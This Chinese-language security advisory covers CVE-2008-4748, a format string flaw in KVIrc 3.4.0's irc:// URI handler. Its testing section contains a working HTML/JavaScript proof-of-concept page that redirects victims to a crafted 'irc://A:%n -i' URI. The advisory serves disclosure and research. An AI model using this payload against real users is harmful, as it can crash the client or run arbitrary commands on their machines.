发布日期：2008-10-24
更新日期：2008-10-28

受影响系统：

KVIrc KVIrc 3.4.0

描述：

---

BUGTRAQ  ID: 31912
CVE(CAN) ID: CVE-2008-4748

KVIrc是基于Qt GUI工具包的免费可移植IRC客户端。

KVIrc在处理URI时存在格式串漏洞，如果将KVIrc设置为默认的IRC URI处理器的话，则用户受骗跟随了特制的irc:// URI就会导致执行任意指令。

<*来源：Gjoko Krstic （liquidworm@gmail.com）
  
  链接：http://secunia.com/advisories/32410/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>

<title>KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)</Title>

<head>

<body>

<center> <br /> <br /> <strong>Warning ! :)</strong> </center>

<body bgcolor="#FFFF00">

<script type="text/javascript">

alert("KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)\n\n\t\tby LiquidWorm (c) 2008");

function poc()
{
    window.location.href = "irc://A:%n -i";
}

var answ = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");

if (answ == true)
{
    poc();
}

    else
    {
        window.location.href = "http://www.kvirc.net";
    }

</script> </body> </head> </html>

建议：

---

厂商补丁：

KVIrc
-----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.kvirc.net/

浏览次数：2397
严重程度：0（网友投票）